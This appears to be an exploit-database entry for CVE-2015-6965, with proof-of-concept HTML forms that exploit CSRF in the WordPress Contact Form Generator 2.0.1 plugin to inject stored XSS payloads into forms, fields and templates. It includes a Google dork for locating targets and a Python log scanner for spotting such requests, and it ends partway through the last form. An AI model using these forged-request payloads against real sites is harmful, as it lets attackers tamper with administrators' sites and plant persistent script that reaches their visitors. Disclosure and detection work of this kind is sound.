WordPress Plugin Contact Form Generator 2.0.1 - Multiple Cross-Site Request Forgery Vulnerabilities

Related Vulnerabilities: CVE-2015-6965  
Publish Date: 06 Sep 2015
                							

                <html>
  <!--
  # Exploit Title: WordPress Contact Form Generator v2.0.1 and below (create/update field for contact form) CSRF and Persistent issue
  # Date: 2015-09-04
  # Google Dork: Index of /wp-content/plugins/contact-form-generator/
  # Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
  # Vendor Homepage: http://creative-solutions.net/
  # plugin uri: http://creative-solutions.net/wordpress/contact-form-generator/
  # Software Link: https://downloads.wordpress.org/plugin/contact-form-generator.zip
  # Version: 2.0.1
  # Tested on: windows 10 + firefox. 

  ======================
    Description (plugin)
  ======================
  Contact Form Generator is a powerful contact form builder for WordPress! See
  <a href="http://creative-solutions.net/wordpress/contact-form-generator/demo">Live Demos</a>. It is packed with a
  <a href="http://creative-solutions.net/wordpress/contact-form-generator/template-creator-demo">Template Creator Wizard</a>
  to create fantastic forms in a matter of seconds without coding.
  (copy of ´contactformgenerator.php´ file)
  ===================
   TECHNICAL DETAILS
  ===================
  A CSRF issue was found in the latest version of the WordPress plugin 'Contact Form Generator'.
  The issue can be exploited by sending a specially crafted link to a WordPress administrator who has the vulnerable plugin installed.

  Form field creation: when the victim opens the link, a new form is created and HTML / JS code is injected
  without the victim's knowledge.

  Update form field: when the victim opens the link, the information of the form identified by the ´id´
  parameter is updated, injecting HTML / JS code.

  -->
  <!--
  ================================
   Field form creation [CSRF PoC]
  ================================
  -->
  <body>
    <form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=fields" method="POST">
      <input type="hidden" name="name" value=">"<img src=x>" />
      <input type="hidden" name="id_form" value="8" /> <!-- an existing form id value for this element -->
      <input type="hidden" name="id_type" value="1" />
      <input type="hidden" name="task" value="save" />
      <input type="hidden" name="id" value="0" />
      <input type="submit" value="Click me for create a field" />
    </form>
  </body>
 <!--
  ================================
   Field form update [CSRF PoC]
  ================================
  -->
  <body>
    <form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=fields" method="POST">
      <input type="hidden" name="name" value="s" onmouseover="alert(/i0-sec/)" a=" />
      <input type="hidden" name="tooltip_text" value="s" onmouseover="alert(/i0-sec/)" a=" />
      
      <input type="hidden" name="id_form" value="3" /> <!-- an existing form id value -->
      
      <input type="hidden" name="id_type" value="1" />
      <input type="hidden" name="column_type" value="0" />
      <input type="hidden" name="required" value="0" />
      <input type="hidden" name="published" value="1" />
      <input type="hidden" name="width" value="s" onmouseover="alert(/i0-sec/)" a=" />
      <input type="hidden" name="field_margin_top" value="s" onmouseover="alert(/i0-sec/)" a=" />
      <input type="hidden" name="task" value="save" />

      <input type="hidden" name="id" value="7" />  <!-- field id to edit -->

      <input type="submit" value="Click me for update a field" />
    </form>
  </body>
</html>
<!--
  2015-09-02: vulnerability found
  2015-09-04: Reported to vendor
  2015-09-04: Full disclosure  
-->

<html>
  <!--
  # Exploit Title: WordPress Contact Form Generator v2.0.1 and below (create/update form) CSRF and Persistent issue
  # Date: 2015-09-04
  # Google Dork: Index of /wp-content/plugins/contact-form-generator/
  # Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
  # Vendor Homepage: http://creative-solutions.net/
  # plugin uri: http://creative-solutions.net/wordpress/contact-form-generator/
  # Software Link: https://downloads.wordpress.org/plugin/contact-form-generator.zip
  # Version: 2.0.1
  # Tested on: windows 10 + firefox. 

  ======================
    Description (plugin)
  ======================
  Contact Form Generator is a powerful contact form builder for WordPress! See
  <a href="http://creative-solutions.net/wordpress/contact-form-generator/demo">Live Demos</a>. It is packed with a
  <a href="http://creative-solutions.net/wordpress/contact-form-generator/template-creator-demo">Template Creator Wizard</a>
  to create fantastic forms in a matter of seconds without coding.
  (copy of ´contactformgenerator.php´ file)
  ===================
   TECHNICAL DETAILS
  ===================
  A CSRF issue was found in the latest version of the WordPress plugin 'Contact Form Generator'.
  The issue can be exploited by sending a specially crafted link to a WordPress administrator who has the vulnerable plugin installed.

  Template creation: when the victim opens the link, a new form is created and HTML / JS code is injected
  without the victim's knowledge.

  Update form: when the victim opens the link, the information of the form identified by the ´id´
  parameter is updated, injecting HTML / JS code.
  -->
   <!-- 
  =========================
   Create form [CSRF PoC ]
  =========================
  payload: "><img src=[x]><
  -->

  <body>
    <form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=forms" method="POST">
      <input type="hidden" name="name" value="dsSASA"><img src=1><" />
      <input type="hidden" name="top_text" value="xds"><img src=2><" />
      <input type="hidden" name="pre_text" value="</textarea>"><img src=3><" />
      <input type="hidden" name="thank_you_text" value="Message successfully sent"><img src=4><" />
      <input type="hidden" name="send_text" value="Send"><img src=5><" />
      <input type="hidden" name="send_new_text" value="New email"><img src=6><" />
      <input type="hidden" name="close_alert_text" value="Close"><img src=7><" />
      <input type="hidden" name="form_width" value="100%"><img src=8><" />
      <input type="hidden" name="id_template" value="0" /> 
      <input type="hidden" name="email_to" value=""><img src=9><" />
      <input type="hidden" name="email_bcc" value=""><img src=10><" />
      <input type="hidden" name="email_subject" value=""><img src=11><" />
      <input type="hidden" name="email_from" value=""><img src=12><" />
      <input type="hidden" name="email_from_name" value=""><img src=13><" />
      <input type="hidden" name="email_replyto" value=""><img src=14><" />
      <input type="hidden" name="email_replyto_name" value=""><img src=15><" />
      <input type="hidden" name="redirect" value="0" />
      <input type="hidden" name="redirect_itemid" value="2"><img src=17><" />
      <input type="hidden" name="redirect_url" value=""><img src=16><" />
      <input type="hidden" name="redirect_delay" value="0" />
      <input type="hidden" name="send_copy_enable" value="1" />
      <input type="hidden" name="send_copy_text" value="Send me a copy"><img src=17><" />
      <input type="hidden" name="shake_count" value="2" />
      <input type="hidden" name="shake_distanse" value="10" />
      <input type="hidden" name="shake_duration" value="300" />
      <input type="hidden" name="email_info_show_referrer" value="1" />
      <input type="hidden" name="email_info_show_ip" value="1" />
      <input type="hidden" name="email_info_show_browser" value="1" />
      <input type="hidden" name="email_info_show_os" value="1" />
      <input type="hidden" name="email_info_show_sc_res" value="1" />
      <input type="hidden" name="show_back" value="1" />
      <input type="hidden" name="published" value="1" />
      <input type="hidden" name="custom_css" value="</textarea>"><img src=21><" />
      <input type="hidden" name="task" value="save" />
      <input type="hidden" name="id" value="0" /> 
      <input type="submit" value="Click me for create a form" />
    </form>
  </body>
  <!-- 
  ==========================
    Update form [CSRF PoC ]
  ==========================
  payload: "><img src=[x]><
  -->
  <body>
    <form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=forms" method="POST">
      <input type="hidden" name="name" value="dsSASA"><img src=1><" />
      <input type="hidden" name="top_text" value="xds"><img src=2><" />
      <input type="hidden" name="pre_text" value="</textarea>"><img src=3><" />
      <input type="hidden" name="thank_you_text" value="Message successfully sent"><img src=4><" />
      <input type="hidden" name="send_text" value="Send"><img src=5><" />
      <input type="hidden" name="send_new_text" value="New email"><img src=6><" />
      <input type="hidden" name="close_alert_text" value="Close"><img src=7><" />
      <input type="hidden" name="form_width" value="100%"><img src=8><" />
      <input type="hidden" name="id_template" value="0" /> 
      <input type="hidden" name="email_to" value=""><img src=9><" />
      <input type="hidden" name="email_bcc" value=""><img src=10><" />
      <input type="hidden" name="email_subject" value=""><img src=11><" />
      <input type="hidden" name="email_from" value=""><img src=12><" />
      <input type="hidden" name="email_from_name" value=""><img src=13><" />
      <input type="hidden" name="email_replyto" value=""><img src=14><" />
      <input type="hidden" name="email_replyto_name" value=""><img src=15><" />
      <input type="hidden" name="redirect" value="0" />
      <input type="hidden" name="redirect_itemid" value="2"><img src=17><" />
      <input type="hidden" name="redirect_url" value=""><img src=16><" />
      <input type="hidden" name="redirect_delay" value="0" />
      <input type="hidden" name="send_copy_enable" value="1" />
      <input type="hidden" name="send_copy_text" value="Send me a copy"><img src=17><" />
      <input type="hidden" name="shake_count" value="2" />
      <input type="hidden" name="shake_distanse" value="10" />
      <input type="hidden" name="shake_duration" value="300" />
      <input type="hidden" name="email_info_show_referrer" value="1" />
      <input type="hidden" name="email_info_show_ip" value="1" />
      <input type="hidden" name="email_info_show_browser" value="1" />
      <input type="hidden" name="email_info_show_os" value="1" />
      <input type="hidden" name="email_info_show_sc_res" value="1" />
      <input type="hidden" name="show_back" value="1" />
      <input type="hidden" name="published" value="1" />
      <input type="hidden" name="custom_css" value="</textarea>"><img src=21><" />
      <input type="hidden" name="task" value="save" />
      <input type="hidden" name="id" value="0" /> 
      <input type="submit" value="Click me for edit form" />
    </form>
  </body>
</html>
<!--
  ===========
   TIMELINE
  ===========
  2015-09-02: vulnerability found
  2015-09-04: Reported to vendor
  2015-09-04: Full disclosure
-->
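
A detection sketch for the requests the PoCs on this page send, added here as an example and not part of the original advisory: it scans combined-format access-log lines for POSTs to `admin.php?page=cfg_forms&act=cfg_submit_data` with `holder` set to `fields`, `forms` or `templates`, and flags those whose Referer is cross-origin or missing. The log lines, host names and function names are constructed for illustration, and the site origin is an assumption you supply.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Combined Log Format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"$'
)

# The three holder values used by the PoC forms on this page.
HOLDERS = {"fields", "forms", "templates"}

# Constructed sample log (documentation IP ranges, made-up host names).
SAMPLE_LOG = """
192.0.2.10 - admin [04/Sep/2015:10:01:02 +0000] "POST /wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=fields HTTP/1.1" 302 - "http://blog.example/wordpress2/wp-admin/admin.php?page=cfg_forms" "Mozilla/5.0"
192.0.2.10 - admin [04/Sep/2015:10:07:41 +0000] "POST /wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=forms HTTP/1.1" 302 - "http://other-site.example/page.html" "Mozilla/5.0"
192.0.2.10 - admin [04/Sep/2015:10:09:13 +0000] "POST /wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=templates HTTP/1.1" 302 - "-" "Mozilla/5.0"
192.0.2.10 - admin [04/Sep/2015:10:10:00 +0000] "GET /wordpress2/wp-admin/admin.php?page=cfg_forms HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [04/Sep/2015:10:11:30 +0000] "POST /wordpress2/wp-login.php HTTP/1.1" 200 2048 "http://other-site.example/page.html" "Mozilla/5.0"
"""


def cfg_save_holder(method, target):
    """Return the holder name if this is a plugin save request, else None."""
    if method != "POST":
        return None
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/admin.php"):
        return None
    query = parse_qs(parts.query)
    # PHP keeps the last value of a repeated parameter, so look at [-1].
    if query.get("page", [""])[-1] != "cfg_forms":
        return None
    if query.get("act", [""])[-1] != "cfg_submit_data":
        return None
    holder = query.get("holder", [""])[-1]
    return holder if holder in HOLDERS else None


def classify_referer(referer, site_origins):
    """Compare the Referer's scheme://host[:port] with the site's own origins."""
    if referer in ("", "-"):
        return "missing"
    parts = urlsplit(referer)
    origin = f"{parts.scheme}://{parts.netloc}".lower()
    return "same-origin" if origin in site_origins else "cross-origin"


def find_suspect_saves(lines, site_origins):
    """Return plugin save requests whose Referer is cross-origin or missing."""
    origins = {o.lower().rstrip("/") for o in site_origins}
    findings = []
    for line in lines:
        match = LOG_RE.match(line.strip())
        if not match:
            continue  # blank or non-combined-format line
        holder = cfg_save_holder(match["method"], match["target"])
        if holder is None:
            continue
        verdict = classify_referer(match["referer"], origins)
        if verdict == "same-origin":
            continue
        findings.append({
            "time": match["time"],
            "ip": match["ip"],
            "holder": holder,
            "referer": match["referer"],
            "referer_check": verdict,
        })
    return findings


if __name__ == "__main__":
    # Assumed site origin for the constructed log above.
    for finding in find_suspect_saves(SAMPLE_LOG.splitlines(), {"http://blog.example"}):
        print(finding)
```

A missing Referer is a weaker signal than a cross-origin one, since referrer policies can strip it, and a same-origin Referer does not rule out a request driven by script already stored on the site.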

<html>
  <!--
  # Exploit Title: WordPress Contact Form Generator v2.0.1 and below (create/update template for contact form) CSRF and Persistent issue
  # Date: 2015-09-04
  # Google Dork: Index of /wp-content/plugins/contact-form-generator/
  # Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
  # Vendor Homepage: http://creative-solutions.net/
  # plugin uri: http://creative-solutions.net/wordpress/contact-form-generator/
  # Software Link: https://downloads.wordpress.org/plugin/contact-form-generator.zip
  # Version: 2.0.1
  # Tested on: windows 10 + firefox. 

  ======================
    Description (plugin)
  ======================
  Contact Form Generator is a powerful contact form builder for WordPress! See
  <a href="http://creative-solutions.net/wordpress/contact-form-generator/demo">Live Demos</a>. It is packed with a
  <a href="http://creative-solutions.net/wordpress/contact-form-generator/template-creator-demo">Template Creator Wizard</a>
  to create fantastic forms in a matter of seconds without coding.
  (copy of ´contactformgenerator.php´ file)
  ===================
   TECHNICAL DETAILS
  ===================
  A CSRF issue was found in the latest version of the WordPress plugin 'Contact Form Generator'.
  The issue can be exploited by sending a specially crafted link to a WordPress administrator who has the vulnerable plugin installed.

  Template creation: when the victim opens the link, a new template is created and HTML / JS code is injected
  without the victim's knowledge.

  Update template: when the victim opens the link, the information of the template identified by the ´id´
  parameter is updated, injecting HTML / JS code.

  -->
  <!-- 
  ==============================
  create a template [CSRF PoC ]
  ==============================
  payload: "><img src=x>
  -->
  <body>
    <form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=templates" method="POST">
      <input type="hidden" name="name" value="xsa"><img src=x>" />  <!-- persistent form name [XSS] -->
      <input type="hidden" name="published" value="1" />
      <input type="hidden" name="task" value="save" />
      <input type="hidden" name="id" value="0" />
      <input type="submit" value="Click me for add new template" />
    </form>
  </body>
  <!-- 
  ==============================
  edit a template [CSRF PoC ]
  ==============================
  payload: "><img src=x>
  -->
  <body>
    <form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=templates" method="POST">
      <input type="hidden" name="name" value=""><img src=x>" />
      <input type="hidden" name="styles[587]" value=""><img src=x>" />
      <input type="hidden" name="styles[588]" value=""><img src=x>" />
      <input type="hidden" name="styles[131]" value="inherit" />
      <input type="hidden" name="styles[589]" value="1" />
      <input type="hidden" name="styles[629]" value="dark-thin" />
      <input type="hidden" name="styles[630]" value="dark-thin" />
      <input type="hidden" name="styles[627]" value="0" />
      <input type="hidden" name="styles[0]" value=""><img src=x>" />
      <input type="hidden" name="styles[130]" value=""><img src=x>" />
      <input type="hidden" name="styles[517]" value=""><img src=x>" />
      <input type="hidden" name="styles[518]" value=""><img src=x>" />
      <input type="hidden" name="styles[1]" value=""><img src=x>" />
      <input type="hidden" name="styles[2]" value=""><img src=x>" />
      <input type="hidden" name="styles[3]" value="solid" />
      <input type="hidden" name="styles[4]" value=""><img src=x>" />
      <input type="hidden" name="styles[5]" value=""><img src=x>" />
      <input type="hidden" name="styles[6]" value=""><img src=x>" />
      <input type="hidden" name="styles[7]" value=""><img src=x>" />
      <input type="hidden" name="styles[8]" value=""><img src=x>" />
      <input type="hidden" name="styles[9]" value=""><img src=x>" />
      <input type="hidden" name="styles[10]" value=""><img src=x>" />
      <input type="hidden" name="styles[11]" value=""><img src=x>" />
      <input type="hidden" name="styles[12]" value=""><img src=x>" />
      <input type="hidden" name="styles[13]" value=""><img src=x>" />
      <input type="hidden" name="styles[14]" value=""><img src=x>" />
      <input type="hidden" name="styles[15]" value=""><img src=x>" />
      <input type="hidden" name="styles[16]" value=""><img src=x>" />
      <input type="hidden" name="styles[17]" value=""><img src=x>" />
      <input type="hidden" name="styles[18]" value=""><img src=x>" />
      <input type="hidden" name="styles[19]" value=""><img src=x>" />
      <input type="hidden" name="styles[600]" value="0" />
      <input type="hidden" name="styles[601]" value=""><img src=x>" />
      <input type="hidden" name="styles[602]" value=""><img src=x>" />
      <input type="hidden" name="styles[603]" value=""><img src=x>" />
      <input type="hidden" name="styles[604]" value=""><img src=x>" />
      <input type="hidden" name="styles[605]" value=""><img src=x>" />
      <input type="hidden" name="styles[606]" value=""><img src=x>" />
      <input type="hidden" name="styles[607]" value=""><img src=x>" />
      <input type="hidden" name="styles[608]" value="solid" />
      <input type="hidden" name="styles[609]" value=""><img src=x>" />
      <input type="hidden" name="styles[610]" value="0" />
      <input type="hidden" name="styles[611]" value=""><img src=x>" />
      <input type="hidden" name="styles[612]" value=""><img src=x>" />
      <input type="hidden" name="styles[613]" value=""><img src=x>" />
      <input type="hidden" name="styles[614]" value=""><img src=x>" />
      <input type="hidden" name="styles[615]" value=""><img src=x>" />
      <input type="hidden" name="styles[616]" value=""><img src=x>" />
      <input type="hidden" name="styles[617]" value="0" />
      <input type="hidden" name="styles[618]" value=""><img src=x>" />
      <input type="hidden" name="styles[619]" value=""><img src=x>" />
      <input type="hidden" name="styles[620]" value=""><img src=x>" />
      <input type="hidden" name="styles[621]" value=""><img src=x>" />
      <input type="hidden" name="styles[622]" value=""><img src=x>" />
      <input type="hidden" name="styles[623]" value=""><img src=x>" />
      <input type="hidden" name="styles[624]" value=""><img src=x>" />
      <input type="hidden" name="styles[625]" value="solid" />
      <input type="hidden" name="styles[626]" value=""><img src=x>" />
      <input type="hidden" name="styles[20]" value=""><img src=x>" />
      <input type="hidden" name="styles[21]" value=""><img src=x>" />
      <input type="hidden" name="styles[22]" value="normal" />
      <input type="hidden" name="styles[23]" value="normal" />
      <input type="hidden" name="styles[24]" value="none" />
      <input type="hidden" name="styles[25]" value="left" />
      <input type="hidden" name="styles[506]" value="inherit" />
      <input type="hidden" name="styles[510]" value="cfg_font_effect_none" />
      <input type="hidden" name="styles[27]" value=""><img src=x>" />
      <input type="hidden" name="styles[28]" value=""><img src=x>" />
      <input type="hidden" name="styles[29]" value=""><img src=x>" />
      <input type="hidden" name="styles[30]" value=""><img src=x>" />
      <input type="hidden" name="styles[190]" value=""><img src=x>" />
      <input type="hidden" name="styles[191]" value=""><img src=x>" />
      <input type="hidden" name="styles[192]" value=""><img src=x>" />
      <input type="hidden" name="styles[502]" value="left" />
      <input type="hidden" name="styles[193]" value=""><img src=x>" />
      <input type="hidden" name="styles[194]" value=""><img src=x>" />
      <input type="hidden" name="styles[195]" value=""><img src=x>" />
      <input type="hidden" name="styles[196]" value="solid" />
      <input type="hidden" name="styles[197]" value=""><img src=x>" />
      <input type="hidden" name="styles[198]" value=""><img src=x>" />
      <input type="hidden" name="styles[199]" value="normal" />
      <input type="hidden" name="styles[200]" value="normal" />
      <input type="hidden" name="styles[201]" value="none" />
      <input type="hidden" name="styles[202]" value="inherit" />
      <input type="hidden" name="styles[511]" value="cfg_font_effect_none" />
      <input type="hidden" name="styles[203]" value=""><img src=x>" />
      <input type="hidden" name="styles[204]" value=""><img src=x>" />
      <input type="hidden" name="styles[205]" value=""><img src=x>" />
      <input type="hidden" name="styles[206]" value=""><img src=x>" />
      <input type="hidden" name="styles[215]" value=""><img src=x>" />
      <input type="hidden" name="styles[216]" value=""><img src=x>" />
      <input type="hidden" name="styles[217]" value=""><img src=x>" />
      <input type="hidden" name="styles[218]" value=""><img src=x>" />
      <input type="hidden" name="styles[31]" value=""><img src=x>" />
      <input type="hidden" name="styles[32]" value=""><img src=x>" />
      <input type="hidden" name="styles[33]" value="normal" />
      <input type="hidden" name="styles[34]" value="normal" />
      <input type="hidden" name="styles[35]" value="none" />
      <input type="hidden" name="styles[36]" value="left" />
      <input type="hidden" name="styles[507]" value="inherit" />
      <input type="hidden" name="styles[512]" value="cfg_font_effect_none" />
      <input type="hidden" name="styles[37]" value=""><img src=x>" />
      <input type="hidden" name="styles[38]" value=""><img src=x>" />
      <input type="hidden" name="styles[39]" value=""><img src=x>" />
      <input type="hidden" name="styles[40]" value=""><img src=x>" />
      <input type="hidden" name="styles[41]" value=""><img src=x>" />
      <input type="hidden" name="styles[42]" value=""><img src=x>" />
      <input type="hidden" name="styles[43]" value="normal" />
      <input type="hidden" name="styles[44]" value="normal" />
      <input type="hidden" name="styles[509]" value="inherit" />
      <input type="hidden" name="styles[46]" value=""><img src=x>" />
      <input type="hidden" name="styles[47]" value=""><img src=x>" />
      <input type="hidden" name="styles[48]" value=""><img src=x>" />
      <input type="hidden" name="styles[49]" value=""><img src=x>" />
      <input type="hidden" name="styles[505]" value="white" />
      <input type="hidden" name="styles[508]" value="inherit" />
      <input type="hidden" name="styles[132]" value=""><img src=x>" />
      <input type="hidden" name="styles[133]" value=""><img src=x>" />
      <input type="hidden" name="styles[168]" value=""><img src=x>" />
      <input type="hidden" name="styles[519]" value=""><img src=x>" />
      <input type="hidden" name="styles[520]" value=""><img src=x>" />
      <input type="hidden" name="styles[500]" value="left" />
      <input type="hidden" name="styles[501]" value="left" />
      <input type="hidden" name="styles[134]" value=""><img src=x>" />
      <input type="hidden" name="styles[135]" value=""><img src=x>" />
      <input type="hidden" name="styles[136]" value="solid" />
      <input type="hidden" name="styles[137]" value=""><img src=x>" />
      <input type="hidden" name="styles[138]" value=""><img src=x>" />
      <input type="hidden" name="styles[139]" value=""><img src=x>" />
      <input type="hidden" name="styles[140]" value=""><img src=x>" />
      <input type="hidden" name="styles[141]" value=""><img src=x>" />
      <input type="hidden" name="styles[142]" value=""><img src=x>" />
      <input type="hidden" name="styles[143]" value=""><img src=x>" />
      <input type="hidden" name="styles[144]" value=""><img src=x>" />
      <input type="hidden" name="styles[145]" value=""><img src=x>" />
      <input type="hidden" name="styles[146]" value=""><img src=x>" />
      <input type="hidden" name="styles[147]" value=""><img src=x>" />
      <input type="hidden" name="styles[148]" value=""><img src=x>" />
      <input type="hidden" name="styles[149]" value="normal" />
      <input type="hidden" name="styles[150]" value="normal" />
      <input type="hidden" name="styles[151]" value="none" />
      <input type="hidden" name="styles[152]" value="inherit" />
      <input type="hidden" name="styles[153]" value=""><img src=x>" />
      <input type="hidden" name="styles[154]" value=""><img src=x>" />
      <input type="hidden" name="styles[155]" value=""><img src=x>" />
      <input type="hidden" name="styles[156]" value=""><img src=x>" />
      <input type="hidden" name="styles[157]" value=""><img src=x>" />
      <input type="hidden" name="styles[158]" value=""><img src=x>" />
      <input type="hidden" name="styles[159]" value=""><img src=x>" />
      <input type="hidden" name="styles[160]" value=""><img src=x>" />
      <input type="hidden" name="styles[161]" value=""><img src=x>" />
      <input type="hidden" name="styles[162]" value=""><img src=x>" />
      <input type="hidden" name="styles[163]" value=""><img src=x>" />
      <input type="hidden" name="styles[164]" value=""><img src=x>" />
      <input type="hidden" name="styles[165]" value=""><img src=x>" />
      <input type="hidden" name="styles[166]" value=""><img src=x>" />
      <input type="hidden" name="styles[167]" value=""><img src=x>" />
      <input type="hidden" name="styles[513]" value="cfg_font_effect_none" />
      <input type="hidden" name="styles[176]" value=""><img src=x>" />
      <input type="hidden" name="styles[177]" value=""><img src=x>" />
      <input type="hidden" name="styles[178]" value=""><img src=x>" />
      <input type="hidden" name="styles[179]" value=""><img src=x>" />
      <input type="hidden" name="styles[180]" value=""><img src=x>" />
      <input type="hidden" name="styles[181]" value=""><img src=x>" />
      <input type="hidden" name="styles[182]" value=""><img src=x>" />
      <input type="hidden" name="styles[183]" value=""><img src=x>" />
      <input type="hidden" name="styles[184]" value=""><img src=x>" />
      <input type="hidden" name="styles[185]" value=""><img src=x>" />
      <input type="hidden" name="styles[186]" value=""><img src=x>" />
      <input type="hidden" name="styles[187]" value=""><img src=x>" />
      <input type="hidden" name="styles[188]" value=""><img src=x>" />
      <input type="hidden" name="styles[189]" value=""><img src=x>" />
      <input type="hidden" name="styles[171]" value=""><img src=x>" />
      <input type="hidden" name="styles[514]" value="cfg_font_effect_none" />
      <input type="hidden" name="styles[172]" value=""><img src=x>" />
      <input type="hidden" name="styles[173]" value=""><img src=x>" />
      <input type="hidden" name="styles[174]" value=""><img src=x>" />
      <input type="hidden" name="styles[175]" value=""><img src=x>" />
      <input type="hidden" name="styles[169]" value=""><img src=x>" />
      <input type="hidden" name="styles[521]" value=""><img src=x>" />
      <input type="hidden" name="styles[522]" value=""><img src=x>" />
      <input type="hidden" name="styles[170]" value=""><img src=x>" />
      <input type="hidden" name="styles[523]" value=""><img src=x>" />
      <input type="hidden" name="styles[535]" value=""><img src=x>" />
      <input type="hidden" name="styles[536]" value=""><img src=x>" />
      <input type="hidden" name="styles[537]" value=""><img src=x>" />
      <input type="hidden" name="styles[538]" value=""><img src=x>" />
      <input type="hidden" name="styles[539]" value=""><img src=x>" />
      <input type="hidden" name="styles[540]" value=""><img src=x>" />
      <input type="hidden" name="styles[541]" value=""><img src=x>" />
      <input type="hidden" name="styles[542]" value=""><img src=x>" />
      <input type="hidden" name="styles[543]" value=""><img src=x>" />
      <input type="hidden" name="styles[544]" value=""><img src=x>" />
      <input type="hidden" name="styles[545]" value=""><img src=x>" />
      <input type="hidden" name="styles[546]" value=""><img src=x>" />
      <input type="hidden" name="styles[547]" value="solid" />
      <input type="hidden" name="styles[548]" value=""><img src=x>" />
      <input type="hidden" name="styles[549]" value=""><img src=x>" />
      <input type="hidden" name="styles[550]" value=""><img src=x>" />
      <input type="hidden" name="styles[551]" value=""><img src=x>" />
      <input type="hidden" name="styles[524]" value=""><img src=x>" />
      <input type="hidden" name="styles[525]" value=""><img src=x>" />
      <input type="hidden" name="styles[526]" value="normal" />
      <input type="hidden" name="styles[527]" value="normal" />
      <input type="hidden" name="styles[528]" value="none" />
      <input type="hidden" name="styles[529]" value="inherit" />
      <input type="hidden" name="styles[530]" value="cfg_font_effect_none" />
      <input type="hidden" name="styles[531]" value=""><img src=x>" />
      <input type="hidden" name="styles[532]" value=""><img src=x>" />
      <input type="hidden" name="styles[533]" value=""><img src=x>" />
      <input type="hidden" name="styles[534]" value=""><img src=x>" />
      <input type="hidden" name="styles[91]" value=""><img src=x>" />
      <input type="hidden" name="styles[50]" value=""><img src=x>" />
      <input type="hidden" name="styles[212]" value="left" />
      <input type="hidden" name="styles[92]" value=""><img src=x>" />
      <input type="hidden" name="styles[93]" value=""><img src=x>" />
      <input type="hidden" name="styles[209]" value=""><img src=x>" />
      <input type="hidden" name="styles[100]" value=""><img src=x>" />
      <input type="hidden" name="styles[101]" value=""><img src=x>" />
      <input type="hidden" name="styles[127]" value="solid" />
      <input type="hidden" name="styles[102]" value=""><img src=x>" />
      <input type="hidden" name="styles[103]" value=""><img src=x>" />
      <input type="hidden" name="styles[104]" value=""><img src=x>" />
      <input type="hidden" name="styles[105]" value=""><img src=x>" />
      <input type="hidden" name="styles[94]" value=""><img src=x>" />
      <input type="hidden" name="styles[95]" value=""><img src=x>" />
      <input type="hidden" name="styles[96]" value=""><img src=x>" />
      <input type="hidden" name="styles[97]" value=""><img src=x>" />
      <input type="hidden" name="styles[98]" value=""><img src=x>" />
      <input type="hidden" name="styles[99]" value=""><img src=x>" />
      <input type="hidden" name="styles[106]" value=""><img src=x>" />
      <input type="hidden" name="styles[107]" value=""><img src=x>" />
      <input type="hidden" name="styles[108]" value="normal" />
      <input type="hidden" name="styles[109]" value="normal" />
      <input type="hidden" name="styles[110]" value="none" />
      <input type="hidden" name="styles[112]" value="inherit" />
      <input type="hidden" name="styles[515]" value="cfg_font_effect_none" />
      <input type="hidden" name="styles[113]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[114]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[115]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[116]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[51]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[52]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[124]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[516]" value="cfg_font_effect_none" />
      <input type="hidden" name="styles[125]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[126]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[117]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[118]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[119]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[120]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[121]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[122]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[552]" value="1" />
      <input type="hidden" name="styles[553]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[554]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[555]" value="normal" />
      <input type="hidden" name="styles[556]" value="normal" />
      <input type="hidden" name="styles[596]" value="none" />
      <input type="hidden" name="styles[590]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[591]" value="solid" />
      <input type="hidden" name="styles[592]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[558]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[559]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[560]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[561]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[563]" value="1" />
